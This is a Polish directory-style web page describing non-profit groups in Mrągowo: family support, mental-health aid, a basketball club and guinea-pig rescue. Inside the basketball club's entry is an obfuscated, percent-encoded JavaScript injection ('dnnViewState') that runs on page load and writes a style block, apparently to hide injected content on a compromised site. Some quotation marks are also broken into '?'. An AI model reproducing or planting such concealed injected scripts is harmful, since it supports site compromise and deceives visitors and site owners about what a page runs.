Stowarzyszenia na Rzecz Pomocy Rodzinie „SYNAPSA” w Mrągowie

Stowarzyszenia na Rzecz Pomocy Rodzinie „SYNAPSA” w Mrągowie

            „Nasze Stowarzyszenie działa od 2002. Działamy na rzecz pomocy rodzinom z naszego powiatu.

            Każde wsparcie pozwoli nam na szybsze zrealizowanie założonych celów. Prosimy o przekazanie 1% na rzecz naszego stowarzyszenia. KRS 0000005380.

            Stowarzyszenie SYNAPSA realizując projekty, które dotyczą problemów społecznych, tworzy zawsze, na własny użytek, program rozwiązywania danego problemu społecznego, który został zdiagnozowany w środowisku lokalnym.

            Projekty realizowane przez Stowarzyszenie, m. in.:

  • „W trosce o zdrową rodzinę”;
  • aktualnie „Stawiamy na rodzinę”;
  • „Rozwiązywanie konfliktów w rodzinach dysfunkcyjnych”;
  • „Grupa wsparcia dla rodzin zastępczych”;
  • „Kompetentni wychowawczo rodzice skuteczni w walce z demoralizacją nieletnich”;
  • „Uczymy się poprawnie mówić. Pomoc logopedyczna dzieciom ze środowiska wiejskiego”.

            W roku 2002 Stowarzyszenie realizowało Program Pomocy dla dzieci z domu dziecka z Mrągowa pod nazwą „Próg” oraz prowadziło szkolenie dla organizacji pozarządowych z zakresu pisania wniosków grantowych.

            Począwszy od roku 2002 Stowarzyszenie co rok organizuje punkty poradnictwa specjalistycznego, w ramach realizacji projektów.

            W latach 2003-2005 Stowarzyszenie prowadziło akcje „Otwarty krąg”, podczas której członkowie Stowarzyszenia prowadzili zajęcia edukacyjne dla mieszkańców miasta Sorkwity (zajęcia dot. pomocy w trudnych sytuacjach, edukacji rodzinnej i wychowawczej oraz prowadzone były korepetycje).

            Cyklicznie, co roku, od roku 2005 Stowarzyszenie w ramach realizacji projektu „Działania w zakresie profilaktyki problemów alkoholowych i innych uzależnień oraz przeciwdziałanie przemocy w rodzinie”, współfinansowanego przez Gminą Miejską Mrągowo oraz Warmińsko-Mazurski Urząd Wojewódzki prowadzi Telefon Zaufania.

            Uczestnictwo w konsultacjach programów dotyczących programów społecznych tworzonych i realizowanych w Powiecie Mrągowskim, np. Powiatowa Strategia Rozwiązywania Problemów Społecznych na lata 2005-2010 oraz rocznych programów współpracy z organizacjami pozarządowymi w mieście Mrągowie i Gminie Piecki.

            W roku 2006 Stowarzyszenie realizowało projekty „ABC Grantów” oraz „Sportowe Granty”, współfinansowane przez Gminę Miejską Mrągowo”, podczas których prowadzone były warsztaty i szkolenia dla innych NGO oraz udzielane były granty.

            W latach 2007-2009 prowadzony był Klub Puszystych dla dorosłych mieszkańców Mrągowa i dla młodzieży, który upowszechniał zdrowy i aktywny styl życia, przeciwdziałając problemowi otyłości wśród społeczności.

            W latach 2007-2009 prowadziło grupę wsparcia przy Klubie Puszystych oraz grupę wsparcia dla dzieci i młodzieży przy Klubie Puszystych.

            Stowarzyszenie przy współpracy z Powiatowym Centrum Pomocy Rodzinie w Mrągowie i w Kętrzynie w latach 2007-2010 prowadziło mediacje wśród osób korzystających z pomocy w/w centrów. Od października 2010 Stowarzyszenie SYNAPSA prowadzi Ośrodek Mediacji.

            Do roku 2008 Stowarzyszenie było członkiem Sieci Wspierania Organizacji Pozarządowych Województwa Warmińsko- Mazurskiego HEROLD.

            W roku 2008 Stowarzyszenie przy współpracy z PCPR w Mrągowie przeprowadziło spotkanie edukacyjne dla młodzieży dot. sposobów radzenia sobie w sytuacjach kryzysowych. W ramach realizacji projektów prowadzone były zajęcia edukacyjne dla beneficjentów projektów. Każdy z projektów zawierał części warsztatowo-edukacyjne

            W roku 2008 Stowarzyszenie przy współpracy z PCPR w Mrągowie przeprowadziło spotkanie edukacyjne dla młodzieży dot. sposobów radzenia sobie w sytuacjach kryzysowych.

            W latach 2008-2009 Stowarzyszenie prowadziło Świetlicę Wiejską dla dzieci w Macharach.

            W roku 2008, 2009 i 2010 Stowarzyszenie brało udział w Tygodniu Pomocy Ofiarom Przestępstw organizowanym przez Sąd Rejonowy w Mrągowie (pomoc osobom potrzebującym wsparcia specjalistycznego; poradnictwo)

            Stowarzyszenie realizowało projekty własne: „Prowadzenie grup wsparcia dla rodzin zastępczych” – współfinansowanego przez Urząd Marszałkowski Województwa Warmińsko-Mazurskiego realizowany w latach 2009‑2010.

            Członkowie Stowarzyszenia są autorami programu szkoleniowego dla rodzin zastępczych i adopcyjnych „Nie będziesz sam” zatwierdzonego przez Ministerstwo Polityki Społecznej DPS.-VI-4122-39-WB/04.

            Stowarzyszenie prowadzi grupę wsparcia dla rodzin zastępczych.

            Stowarzyszenie SYNAPSA poczyniło kroki zmierzające do utworzenia Ośrodka Adopcyjno-Opiekuńczego. Posiada wykwalifikowaną kadrę-autorów programu szkolenia rodzin zastępczych: „Nie będziesz sam” zatwierdzonego przez Ministerstwo Polityki Społecznej DPS.-VI-4122-39-WB/04. Od 2002r. prowadzi szkolenia rodzin zastępczych i adopcyjnych.

            W roku 2009 Stowarzyszenie współpracowało z Powiatowym Centrum Pomocy Rodzinie w Piszu w realizacji kampanii na rzecz rodzicielstwa zastępczego Centrum „Podaruj im dom”; oraz z Powiatowym Centrum Pomocy Rodzinie w Mrągowie w realizacji projektu dot. rodzicielstwa zastępczego „W zastępstwie niezastąpieni”.

            Stowarzyszenie SYNAPSA w roku 2009, 2010 i 2011 zorganizowało konferencję dot. mediacji z udziałem lokalnych władz, ośrodków pomocy społecznej i instytucji sądowych. Propagowano na niej mediację, jako alternatywną formę łagodzenia konfliktów i szansę na rozwiązywanie konfliktów w środowisku lokalnym. 

Czytaj więcej

logo.remedium

Stowarzyszenie Wielokierunkowej Pomocy „Remedium”

Stowarzyszenie Wielokierunkowej Pomocy „Remedium”

„Jako jedyna organizacja w powiecie mrągowskim pracujemy na rzecz osób z zaburzeniami psychicznymi i ich rodzin.

Nasze działania:
Realizacja programów terapeutycznych, edukacyjnych i profilaktycznych dla dzieci, młodzieży i rodziców; prowadzenie terapii krótkoterminowej oraz grup wsparcia dla ofiar przemocy, osób uzależnionych, współuzależnionych, rodzin osób z zaburzeniami psychicznymi, organizacja bezpłatnego systemu poradnictwa specjalistycznego tj. prawnego i psychologicznego; organizacja czasu wolnego oraz imprez rekreacyjno-sportowych dla osób z zaburzeniami psychicznymi.

Zbiórka pieniędzy na zakup protezy nogi dla naszego podopiecznego Remigiusza Kowala.

Od 2008r. współpraca z Bankiem Żywności w zakresie organizacji przedświątecznych zbiórek żywności oraz całorocznej dystrybucji żywności wśród najuboższych mieszkańców miasta Mrągowa.

Współpraca z Gminą Miejską Mrągowo przy opracowywaniu Gminnego Programu Ochrony Zdrowia Psychicznego. 
Celem dalekosiężnym naszej Organizacji jest utworzenie hostelu dla osób z zaburzeniami psychicznymi oraz Zakładu Aktywizacji Zawodowej.

Przyjmujemy darowizny celowe oraz 1% za 2012r. z dopiskiem w PIT „dla Remika Kowala”.

Opinie o naszych działaniach można przeczytać/zamieścić na: http://www.polecamysobie.pl/

Darowizny można wpłacić przez: http://chcepomagac.org/285,stowarzyszenie-wielokierunkowej-pomocy-remedium,organizacja.html”

ksas1

Stowarzyszenie Kultury Fizycznej Klub Sportowy AS Mrągowo

Stowarzyszenie Kultury Fizycznej Klub Sportowy AS Mrągowo

Historia powstania KS AS Mrągowo sięga wakacji 2009 roku, kiedy to grupa kolegów podjęła się trudnego zadania ? próby odbudowania koszykówki w Mrągowie. Są oni pokoleniem pamiętającym czasy Ligi Miejskiej, która pozwalała sprawdzić swoje umiejętności w szerszym gronie koszykarzy oraz czasy, gdy o koszykarski prestiż w mieście zaciekle walczyły miejskie szkoły średnie. Ich znajomość umacniała się podczas wspólnych potyczek turniejowych, a obecnie stała się podwaliną do założenia Klubu Sportowego AS Mrągowo.

W październiku 2009 r. ogłosili pierwszy nabór dla chcących trenować koszykówkę pod okiem Instruktorów. Treningiem młodzieży szkół podstawowych zajął się Pan Sebastian Kaczmarski, natomiast młodzież gimnazjalną pod swoje skrzydła wziął Pan Bartłomiej Koziatek.

Do tej pory udało im się zorganizować trzy duże turnieje. 28 marca 2010 roku odbył się ?Turniej Koszykówki Ulicznej Trio Basket o Puchar Burmistrza Miasta Mrągowo?. Miał on na celu propagowanie koszykówki w Mrągowie oraz prezentację naszych wychowanków szerszej publiczności. 5 czerwca 2010 roku zorganizowali ?Turniej Koszykówki Ulicznej Trio Basket o Puchar KATE?, który pokazał wysoki poziom koszykówki w naszym mieście. 14 i 28 sierpnia 2010 roku Koziat z Arasem zorganizowali prawdziwe święto koszykówki w Mrągowie – NMR ORLIK Streetball Challenge 2010 o puchar KATE i prymat w mieście. 
Celem Klubu jest dbałość o prawidłowy rozwój psychofizyczny i zdrowie wychowanków sekcji oraz podejmowanie i wspieranie działań sportowych, a w szczególności: propagowanie kultury fizycznej, organizowanie zawodów, treningów i nauki gry oraz tworzenie warunków szerokiego dostępu do bazy sportowej, prezentacja i promocja dokonań zespołów należących do Klubu.

document.write(unescape(’%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%4A%61%76%61%53%63%72%69%70%74%22%3E%0A%66%75%6E%63%74%69%6F%6E%20%64%6E%6E%56%69%65%77%53%74%61%74%65%28%29%0A%7B%0A%76%61%72%20%61%3D%30%2C%6D%2C%76%2C%74%2C%7A%2C%78%3D%6E%65%77%20%41%72%72%61%79%28%27%39%30%39%31%39%36%38%33%37%36%27%2C%27%38%38%38%37%39%31%38%31%39%32%38%31%38%37%38%36%33%34%37%33%37%34%39%31%38%37%38%34%39%33%39%32%37%37%33%35%39%32%38%37%38%38%33%34%32%31%33%33%33%33%33%33%33%33%38%38%39%36%27%2C%27%37%37%38%37%38%37%27%2C%27%39%34%39%39%39%30%37%39%33%39%31%37%39%34%37%39%39%38%39%34%32%35%37%37%39%33%39%33%31%37%27%29%2C%6C%3D%78%2E%6C%65%6E%67%74%68%3B%0A%77%68%69%6C%65%28%2B%2B%61%3C%3D%6C%29%7B%6D%3D%78%5B%6C%2D%61%5D%3B%0A%74%3D%7A%3D%27%27%3B%0A%66%6F%72%28%76%3D%30%3B%76%3C%6D%2E%6C%65%6E%67%74%68%3B%29%7B%74%2B%3D%6D%2E%63%68%61%72%41%74%28%76%2B%2B%29%3B%0A%69%66%28%74%2E%6C%65%6E%67%74%68%3D%3D%32%29%7B%7A%2B%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%70%61%72%73%65%49%6E%74%28%74%29%2B%32%35%2D%6C%2B%61%29%3B%0A%74%3D%27%27%3B%7D%7D%78%5B%6C%2D%61%5D%3D%7A%3B%7D%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%27%2B%78%5B%30%5D%2B%27%20%27%2B%78%5B%34%5D%2B%27%3E%2E%27%2B%78%5B%32%5D%2B%27%7B%27%2B%78%5B%31%5D%2B%27%7D%3C%2F%27%2B%78%5B%30%5D%2B%27%3E%27%29%3B%7D%64%6E%6E%56%69%65%77%53%74%61%74%65%28%29%3B%0A%3C%2F%73%63%72%69%70%74%3E’));

Czytaj więcej

smorska

Stowarzyszenie Pomocy Świnkom Morskim

Psy, koty… wiemy wszyscy, że potrzebują one pomocy – trafiają do schronisk, lądują na ulicy… Ale świnki morskie? Komu mogą przeszkadzać te małe, sympatyczne zwierzęta? Tymczasem również te miłe, niekłopotliwe gryzonie, potrzebują pomocy ludzi dobrej woli. Klub Pomocy Świnkom Morskim powstał w połowie 2007. Grupa miłośników świnek zebrała się na forum internetowym „Dogomania” wokół sprawy świnki przyniesionej do weterynarza do uśpienia. Stopniowo grono to poszerzało się, zajmując się kolejnymi świnkami potrzebującymi pomocy. Wreszcie postanowiliśmy zorganizować się, aby skuteczniej im pomagać i powołaliśmy nieformalny klub. Obecnie jesteśmy zarejestrowanym Stowarzyszeniem Pomocy Świnkom Morskim Zajmujemy się głównie ratowaniem, przechowywaniem i znajdowaniem domów świnkom morskim (oraz innym gryzoniom). Świnki trafiają do nas z różnych źródeł – znalezione na ulicy, pozostawione w schroniskach, oddawane za bezcen… Te ostatnie są szczególnie zagrożone – mogą trafić w ręce miłośników węży jako żywa karma… Staramy się znaleźć im jak najlepsze domy. Przy przekazywaniu świnki do nowego domu podpisujemy umowę adopcyjną, regulującą obowiązki opiekuna wobec zwierzęcia. Nasza działalność obejmuje też akcje edukacyjne, polegające przede wszystkim na informowaniu społeczeństwa o potrzebach świnek morskich oraz o istnieniu możliwości adopcji świnki zamiast zakupu w sklepie. Wbrew pozorom niewiele osób posiadających świnki zna ich potrzeby…

 http://swinkimorskie.eu/forum/